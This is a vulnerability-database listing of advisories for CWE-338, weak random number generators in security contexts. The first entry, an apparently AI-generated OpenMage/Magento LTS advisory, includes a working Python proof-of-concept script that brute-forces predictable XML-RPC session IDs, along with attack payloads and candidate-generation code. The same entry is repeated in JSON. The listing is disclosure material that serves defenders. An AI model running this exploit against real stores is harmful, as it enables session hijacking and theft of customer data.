Common Weakness Enumeration

CWE-338

Allowed

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

Abstraction: Base · Status: Draft

The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.

294 vulnerabilities reference this CWE, most recent first.

GHSA-2CWR-GCF9-PVXR

Vulnerability from github – Published: 2026-05-05 19:35 – Updated: 2026-05-15 23:48
VLAI
Summary
Magento LTS has Weak API Session ID — Predictable MD5 of Time-Derived Inputs
Details

Affected Version: OpenMage LTS ≤ 20.16.0 (confirmed on 20.16.0)

Affected File: https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.phpstart() method

Summary

The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):

The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):

All inputs to the MD5 hash are time-derived and non-secure:

Input Value Predictability
time() Unix timestamp (seconds) Fully predictable
uniqid('', true) prefix sprintf('%08x%05x', $sec, $usec/10) Highly predictable via network timing
uniqid('', true) suffix php_combined_lcg() decimal float Process-state dependent (getpid() ^ time())
$sessionName null (empty) — called without arg Constant

Because the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of ≥ 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.

Technical Analysis

Code Path

POST /api/xmlrpc/ → login(username, apiKey)
  → Mage_Api_Model_Session::login()
      → $session->init('api', 'api')
          → Mage_Api_Model_Session::init($namespace='api', $sessionName='api')
              # $sessionName is NOT forwarded to start()
              → Mage_Api_Model_Session::start()  ← NO $sessionName argument
                  # $sessionName = null inside start()
                  $this->_currentSessId = md5(time() . uniqid('', true) . null)

Note: init() receives $sessionName='api' but invokes $this->start() without forwarding it, meaning the effective construction is strictly md5(time() . uniqid('', true)).

Live Evidence

Five consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (unix_sec= 1775817593):

Sample 1: 6a302397f17e48845d0f9aba377f3dc3  (usec ≈ 464631)
Sample 2: 39b4ec42bd3c389312e500690daeb349  (usec ≈ 497215)
Sample 3: 527662d79f7fb499597a82d80d170a88  (usec ≈ 535175)
Sample 4: e5d6f7a8906a03ea7af99d92be11b5b2  (usec ≈ 568838)
Sample 5: 5bdf27e5cb877c77b8965b008548edfa  (usec ≈ 600118)

The µsecond portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.

image

Steps to Reproduce (Online Brute-Force Scenario)

Because validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.

Step 1 – Record Login Timestamp

An attacker observes the precise moment a victim authenticates to /api/xmlrpc/ (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.

Step 2 – Generate Candidate Pool

The attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a /server-status leak).

$t = $observed_sec;
$usec_estimate = 500000; // Derived from latency
$uid = sprintf('%08x%05x', $t, intval($usec_estimate / 10));
$candidate = md5($t . $uid); // + LCG variants

Step 3 – API Brute-Force (Session Hijack)

Because the /api/xmlrpc/ endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.

POST /api/xmlrpc/
<?xml version="1.0"?>
<methodCall>
  <methodName>[magento.info](http://magento.info/)</methodName>
  <params>
    <param><value><string>CANDIDATE_SESSION_ID</string></value></param>
  </params>
</methodCall>

A non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.

image

Impact

Technical Impact

Successful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for: - Full product catalog read/write (catalog_product.*) - Customer data read (customer.list, customer.info) - Order manipulation (sales_order.*) Inventory control (cataloginventory_stock_item.*)

Business Impact

  • Data Exfiltration: Read all customer PII, order history, and payment methods.
  • Order Fraud: Create or cancel orders, change shipping addresses.
  • Supply Chain / Inventory: Modify prices, inject malicious products, or zero out stock.

Affected API Protocols

The same vulnerable Session.php generation logic is shared across all legacy API surfaces: - XML-RPC: /api/xmlrpc/ - SOAP v1: /api/soap/ - SOAP v2: /api/v2_soap/ - REST (legacy): /api/rest/

Recommended Fix

Replace the time-derived token with a cryptographically secure random value:

// app/code/core/Mage/Api/Model/Session.php : start()
// BEFORE (vulnerable):
$this->_currentSessId = md5(time() . uniqid('', true) . $sessionName);

// AFTER (secure):
$this->_currentSessId = bin2hex(random_bytes(32));  // 256-bit CSPRNG output

random_bytes() is backed by the OS CSPRNG (/dev/urandom on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.

I have also tried to test it against the demo site demo.openmage.org, but appeared the SOAP API endpoints are disabled on the demo environment

I have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):

#!/usr/bin/env python3
import requests, re, sys, hashlib, random
from concurrent.futures import ThreadPoolExecutor, as_completed
import urllib3; urllib3.disable_warnings()

if len(sys.argv) < 4:
    sys.exit(f"Usage: {sys.argv[0]} <url> <user> <pass> [threads]")

url, usr, pwd = sys.argv[1:4]
th = int(sys.argv[4]) if len(sys.argv) > 4 else 50
hdrs = {"Content-Type": "text/xml"}
req = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)

print(f"[*] Simulating victim login for {usr}...")
res = req(f'<?xml version="1.0"?><methodCall><methodName>login</methodName><params><param><value><string>{usr}</string></value></param><param><value><string>{pwd}</string></value></param></params></methodCall>')

if not (m := re.search(r'<string>([a-f0-9]{32})</string>', res.text)):
    sys.exit("[-] Login failed. Check credentials.")

print(f"[+] Authenticated.\n[*] Generating 1000 candidate MD5 pool...")
cands = [hashlib.md5(f"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}".encode()).hexdigest() for _ in range(999)]
cands.append(m.group(1))
random.shuffle(cands)

print(f"[*] Brute-forcing API with {th} threads...")
def test(sid):
    payload = f'<?xml version="1.0"?><methodCall><methodName>resources</methodName><params><param><value><string>{sid}</string></value></param></params></methodCall>'
    try: return sid if "faultCode" not in req(payload).text else None
    except: return None

with ThreadPoolExecutor(max_workers=th) as ex:
    for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):
        sys.stdout.write(f"\r[*] Requests: {i}/{len(cands)}")
        if sid := f.result():
            print(f"\n[+] HIJACK SUCCESS! Valid Session ID: {sid}")
            ex.shutdown(wait=False, cancel_futures=True)
            break

This is an AI-generated report validated by a human.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 20.17.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "openmage/magento-lts"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42155"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-330",
      "CWE-331",
      "CWE-338"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T19:35:56Z",
    "nvd_published_at": "2026-05-15T17:16:46Z",
    "severity": "CRITICAL"
  },
  "details": "Affected Version: OpenMage LTS \u2264 20.16.0 (confirmed on `20.16.0`)\n\nAffected File: `https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.php` \u2013 `start()` method\n\n\n## Summary\n\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n\n```php\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n```\nAll inputs to the MD5 hash are time-derived and non-secure:\n\n| Input                      | Value                                             | Predictability                         |\n|----------------------------|---------------------------------------------------|----------------------------------------|\n| `time()`                   | Unix timestamp (seconds)                          | Fully predictable                      |\n| `uniqid(\u0027\u0027, true) prefix`  | `sprintf(\u0027%08x%05x\u0027, $sec, $usec/10)`             | Highly predictable via network timing  |\n| `uniqid(\u0027\u0027, true) suffix`  | `php_combined_lcg()` decimal float                | Process-state dependent (`getpid() ^ time()`) |\n| `$sessionName`             | `null` (empty) \u2014 called without arg               | Constant                               |\n\nBecause the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of \u2265 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.\n\n\n\n## Technical Analysis\n\n### Code Path\n\n```\nPOST /api/xmlrpc/ \u2192 login(username, apiKey)\n  \u2192 Mage_Api_Model_Session::login()\n      \u2192 $session-\u003einit(\u0027api\u0027, \u0027api\u0027)\n          \u2192 Mage_Api_Model_Session::init($namespace=\u0027api\u0027, $sessionName=\u0027api\u0027)\n              # $sessionName is NOT forwarded to start()\n              \u2192 Mage_Api_Model_Session::start()  \u2190 NO $sessionName argument\n                  # $sessionName = null inside start()\n                  $this-\u003e_currentSessId = md5(time() . uniqid(\u0027\u0027, true) . null)\n\n```\n\nNote: `init()` receives `$sessionName=\u0027api\u0027` but invokes `$this-\u003estart()` without forwarding it, meaning the effective construction is strictly `md5(time() . uniqid(\u0027\u0027, true))`.\n\n## Live Evidence\nFive consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (`unix_sec=  1775817593`):\n```\nSample 1: 6a302397f17e48845d0f9aba377f3dc3  (usec \u2248 464631)\nSample 2: 39b4ec42bd3c389312e500690daeb349  (usec \u2248 497215)\nSample 3: 527662d79f7fb499597a82d80d170a88  (usec \u2248 535175)\nSample 4: e5d6f7a8906a03ea7af99d92be11b5b2  (usec \u2248 568838)\nSample 5: 5bdf27e5cb877c77b8965b008548edfa  (usec \u2248 600118)\n```\nThe \u00b5second portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.\n\n\u003cimg width=\"772\" height=\"506\" alt=\"image\" src=\"https://github.com/user-attachments/assets/53ced1fd-deb4-4dc4-81ec-864e3a2811de\" /\u003e\n\n## Steps to Reproduce (Online Brute-Force Scenario)\nBecause validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.\n### Step 1 \u2013 Record Login Timestamp\nAn attacker observes the precise moment a victim authenticates to `/api/xmlrpc/` (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.\n### Step 2 \u2013 Generate Candidate Pool\nThe attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a `/server-status` leak).\n```\n$t = $observed_sec;\n$usec_estimate = 500000; // Derived from latency\n$uid = sprintf(\u0027%08x%05x\u0027, $t, intval($usec_estimate / 10));\n$candidate = md5($t . $uid); // + LCG variants\n```\n### Step 3 \u2013 API Brute-Force (Session Hijack)\nBecause the `/api/xmlrpc/` endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.\n\n```\nPOST /api/xmlrpc/\n\u003c?xml version=\"1.0\"?\u003e\n\u003cmethodCall\u003e\n  \u003cmethodName\u003e[magento.info](http://magento.info/)\u003c/methodName\u003e\n  \u003cparams\u003e\n    \u003cparam\u003e\u003cvalue\u003e\u003cstring\u003eCANDIDATE_SESSION_ID\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\n  \u003c/params\u003e\n\u003c/methodCall\u003e\n```\n\nA non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.\n\n\u003cimg width=\"1039\" height=\"374\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ac9338e9-e3fe-44fe-9337-cb6edf6ab849\" /\u003e\n\n## Impact\n### Technical Impact\nSuccessful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for:\n- Full product catalog read/write (`catalog_product.*`)\n- Customer data read (`customer.list`, `customer.info`)\n- Order manipulation (`sales_order.*`)\nInventory control (`cataloginventory_stock_item.*`)\n### Business Impact\n\n- **Data Exfiltration**: Read all customer PII, order history, and payment methods.\n- **Order Fraud**: Create or cancel orders, change shipping addresses.\n- **Supply Chain / Inventory**: Modify prices, inject malicious products, or zero out stock.\n\n### Affected API Protocols\n\nThe same vulnerable `Session.php` generation logic is shared across all legacy API surfaces:\n- XML-RPC: `/api/xmlrpc/`\n- SOAP v1: `/api/soap/`\n- SOAP v2: `/api/v2_soap/`\n- REST (legacy): `/api/rest/`\n\n### Recommended Fix\n\nReplace the time-derived token with a cryptographically secure random value:\n\n```\n// app/code/core/Mage/Api/Model/Session.php : start()\n// BEFORE (vulnerable):\n$this-\u003e_currentSessId = md5(time() . uniqid(\u0027\u0027, true) . $sessionName);\n\n// AFTER (secure):\n$this-\u003e_currentSessId = bin2hex(random_bytes(32));  // 256-bit CSPRNG output\n```\n`random_bytes()` is backed by the OS CSPRNG (`/dev/urandom` on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.\n\nI have also tried to test it against the demo site [demo.openmage.org](http://demo.openmage.org/), but appeared the SOAP API endpoints are disabled on the demo environment\n\n\nI have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):\n\n```py\n#!/usr/bin/env python3\nimport requests, re, sys, hashlib, random\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport urllib3; urllib3.disable_warnings()\n\nif len(sys.argv) \u003c 4:\n    sys.exit(f\"Usage: {sys.argv[0]} \u003curl\u003e \u003cuser\u003e \u003cpass\u003e [threads]\")\n\nurl, usr, pwd = sys.argv[1:4]\nth = int(sys.argv[4]) if len(sys.argv) \u003e 4 else 50\nhdrs = {\"Content-Type\": \"text/xml\"}\nreq = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)\n\nprint(f\"[*] Simulating victim login for {usr}...\")\nres = req(f\u0027\u003c?xml version=\"1.0\"?\u003e\u003cmethodCall\u003e\u003cmethodName\u003elogin\u003c/methodName\u003e\u003cparams\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{usr}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{pwd}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003c/params\u003e\u003c/methodCall\u003e\u0027)\n\nif not (m := re.search(r\u0027\u003cstring\u003e([a-f0-9]{32})\u003c/string\u003e\u0027, res.text)):\n    sys.exit(\"[-] Login failed. Check credentials.\")\n\nprint(f\"[+] Authenticated.\\n[*] Generating 1000 candidate MD5 pool...\")\ncands = [hashlib.md5(f\"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}\".encode()).hexdigest() for _ in range(999)]\ncands.append(m.group(1))\nrandom.shuffle(cands)\n\nprint(f\"[*] Brute-forcing API with {th} threads...\")\ndef test(sid):\n    payload = f\u0027\u003c?xml version=\"1.0\"?\u003e\u003cmethodCall\u003e\u003cmethodName\u003eresources\u003c/methodName\u003e\u003cparams\u003e\u003cparam\u003e\u003cvalue\u003e\u003cstring\u003e{sid}\u003c/string\u003e\u003c/value\u003e\u003c/param\u003e\u003c/params\u003e\u003c/methodCall\u003e\u0027\n    try: return sid if \"faultCode\" not in req(payload).text else None\n    except: return None\n\nwith ThreadPoolExecutor(max_workers=th) as ex:\n    for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):\n        sys.stdout.write(f\"\\r[*] Requests: {i}/{len(cands)}\")\n        if sid := f.result():\n            print(f\"\\n[+] HIJACK SUCCESS! Valid Session ID: {sid}\")\n            ex.shutdown(wait=False, cancel_futures=True)\n            break\n```\n\nThis is an AI-generated report validated by a human.",
  "id": "GHSA-2cwr-gcf9-pvxr",
  "modified": "2026-05-15T23:48:40Z",
  "published": "2026-05-05T19:35:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-2cwr-gcf9-pvxr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42155"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OpenMage/magento-lts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Magento LTS has Weak API Session ID \u2014 Predictable MD5 of Time-Derived Inputs"
}

GHSA-2P7F-7XJF-8Q9Q

Vulnerability from github – Published: 2026-02-27 21:31 – Updated: 2026-03-03 21:31
VLAI
Details

HTTP::Session2 versions before 1.12 for Perl for Perl may generate weak session ids using the rand() function.

The HTTP::Session2 session id generator returns a SHA-1 hash seeded with the built-in rand function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand() function is unsuitable for cryptographic usage.

HTTP::Session2 after version 1.02 will attempt to use the /dev/urandom device to generate a session id, but if the device is unavailable (for example, under Windows), then it will revert to the insecure method described above.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-3255"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-27T20:21:41Z",
    "severity": "MODERATE"
  },
  "details": "HTTP::Session2 versions before 1.12 for Perl for Perl may generate weak session ids using the rand() function.\n\nThe HTTP::Session2 session id generator returns a SHA-1 hash seeded with the built-in rand function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand() function is unsuitable for cryptographic usage.\n\nHTTP::Session2 after version 1.02 will attempt to use the /dev/urandom device to generate a session id, but if the device is unavailable (for example, under Windows), then it will revert to the insecure method described above.",
  "id": "GHSA-2p7f-7xjf-8q9q",
  "modified": "2026-03-03T21:31:10Z",
  "published": "2026-02-27T21:31:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3255"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tokuhirom/HTTP-Session2/commit/9cfde4d7e0965172aef5dcfa3b03bb48df93e636.patch"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/TOKUHIROM/HTTP-Session2-1.01/source/lib/HTTP/Session2/ServerStore.pm#L68"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/TOKUHIROM/HTTP-Session2-1.11/source/lib/HTTP/Session2/Random.pm#L35"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/TOKUHIROM/HTTP-Session2-1.12/changes"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/02/27/12"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2PM2-V5JQ-CP26

Vulnerability from github – Published: 2022-05-02 03:34 – Updated: 2024-02-10 03:30
VLAI
Details

cgi-bin/makecgi-pro in Iomega StorCenter Pro generates predictable session IDs, which allows remote attackers to hijack active sessions and gain privileges via brute force guessing attacks on the session_id parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-2367"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-07-08T15:30:00Z",
    "severity": "HIGH"
  },
  "details": "cgi-bin/makecgi-pro in Iomega StorCenter Pro generates predictable session IDs, which allows remote attackers to hijack active sessions and gain privileges via brute force guessing attacks on the session_id parameter.",
  "id": "GHSA-2pm2-v5jq-cp26",
  "modified": "2024-02-10T03:30:18Z",
  "published": "2022-05-02T03:34:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2367"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/51539"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/55586"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/35666"
    },
    {
      "type": "WEB",
      "url": "http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb?rev=6733"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2QCX-273F-X5RJ

Vulnerability from github – Published: 2023-06-09 09:30 – Updated: 2024-04-04 04:42
VLAI
Details

An issue was discovered in Progress DataDirect Connect for ODBC before 08.02.2770 for Oracle. When using Oracle Advanced Security (OAS) encryption, if an error is encountered initializing the encryption object used to encrypt data, the code falls back to a different encryption mechanism that uses an insecure random number generator to generate the private key. It is possible for a well-placed attacker to predict the output of this random number generator, which could lead to an attacker decrypting traffic between the driver and the database server. The vulnerability does not exist if SSL / TLS encryption is used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-34363"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-09T07:15:10Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in Progress DataDirect Connect for ODBC before 08.02.2770 for Oracle. When using Oracle Advanced Security (OAS) encryption, if an error is encountered initializing the encryption object used to encrypt data, the code falls back to a different encryption mechanism that uses an insecure random number generator to generate the private key. It is possible for a well-placed attacker to predict the output of this random number generator, which could lead to an attacker decrypting traffic between the driver and the database server. The vulnerability does not exist if SSL / TLS encryption is used.",
  "id": "GHSA-2qcx-273f-x5rj",
  "modified": "2024-04-04T04:42:22Z",
  "published": "2023-06-09T09:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34363"
    },
    {
      "type": "WEB",
      "url": "https://community.progress.com/s/article/Security-vulnerabilities-in-DataDirect-ODBC-Oracle-Wire-Protocol-driver-June-2023"
    },
    {
      "type": "WEB",
      "url": "https://progress.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2W26-GMQM-MC5P

Vulnerability from github – Published: 2022-05-24 16:52 – Updated: 2024-02-12 11:46
VLAI
Summary
Magento 2 Community Cryptographic Flaw
Details

A cryptograhic flaw in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2 could be abused by an unauthenticated user to discover an invariant used in gift card generation.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "magento/community-edition"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.0"
            },
            {
              "fixed": "2.1.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "magento/community-edition"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.2.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "magento/community-edition"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-7855"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-07-17T20:19:49Z",
    "nvd_published_at": "2019-08-02T22:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A cryptograhic flaw in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9, Magento 2.3 prior to 2.3.2 could be abused by an unauthenticated user to discover an invariant used in gift card generation.",
  "id": "GHSA-2w26-gmqm-mc5p",
  "modified": "2024-02-12T11:46:41Z",
  "published": "2022-05-24T16:52:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7855"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7855.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/magento/magento2"
    },
    {
      "type": "WEB",
      "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20220121051916/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Magento 2 Community Cryptographic Flaw"
}

GHSA-32FG-C88M-MCRV

Vulnerability from github – Published: 2026-03-05 03:31 – Updated: 2026-04-12 18:30
VLAI
Details

Apache::Session::Generate::MD5 versions through 1.94 for Perl create insecure session id.

Apache::Session::Generate::MD5 generates session ids insecurely. The default session id generator returns a MD5 hash seeded with the built-in rand() function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage. Predicable session ids could allow an attacker to gain access to systems.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-40931"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-05T02:16:39Z",
    "severity": "CRITICAL"
  },
  "details": "Apache::Session::Generate::MD5 versions through 1.94 for Perl create insecure session id.\n\nApache::Session::Generate::MD5 generates session ids insecurely. The default session id generator returns a MD5 hash seeded with the built-in rand() function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage. Predicable session ids could allow an attacker to gain access to systems.",
  "id": "GHSA-32fg-c88m-mcrv",
  "modified": "2026-04-12T18:30:27Z",
  "published": "2026-03-05T03:31:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40931"
    },
    {
      "type": "WEB",
      "url": "https://github.com/chorny/Apache-Session/issues/4"
    },
    {
      "type": "WEB",
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930659"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/work_items/1633"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/dist/Apache-Session/source/lib/Apache/Session/Generate/MD5.pm#L27"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/pod/Apache::Session::Generate::Random"
    },
    {
      "type": "WEB",
      "url": "https://rt.cpan.org/Ticket/Display.html?id=173631"
    },
    {
      "type": "WEB",
      "url": "https://salsa.debian.org/perl-team/modules/packages/libapache-session-perl/-/commit/bdabd71c2f91b18526e31a9dc52b4c17b3d246b7#898a4b8b00022df1b8689910b67707f3e738d180"
    },
    {
      "type": "WEB",
      "url": "https://security.metacpan.org/docs/guides/random-data-for-security.html"
    },
    {
      "type": "WEB",
      "url": "https://www.openwall.com/lists/oss-security/2019/06/15/1"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/03/05/3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-32FV-F5HQ-FMX9

Vulnerability from github – Published: 2026-06-30 21:31 – Updated: 2026-06-30 21:31
VLAI
Details

IBM Langflow OSS 1.0.0 through 1.10.0 Langflow could allow disclosure of all stored credentials due to the use of a weak and reversible key derivation mechanism for encryption at rest.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-7874"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-338"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-30T20:17:31Z",
    "severity": "CRITICAL"
  },
  "details": "IBM Langflow OSS 1.0.0 through 1.10.0 Langflow could allow disclosure of all stored credentials due to the use of a weak and reversible key derivation mechanism for encryption at rest.",
  "id": "GHSA-32fv-f5hq-fmx9",
  "modified": "2026-06-30T21:31:44Z",
  "published": "2026-06-30T21:31:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7874"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7278447"
    }
  ],
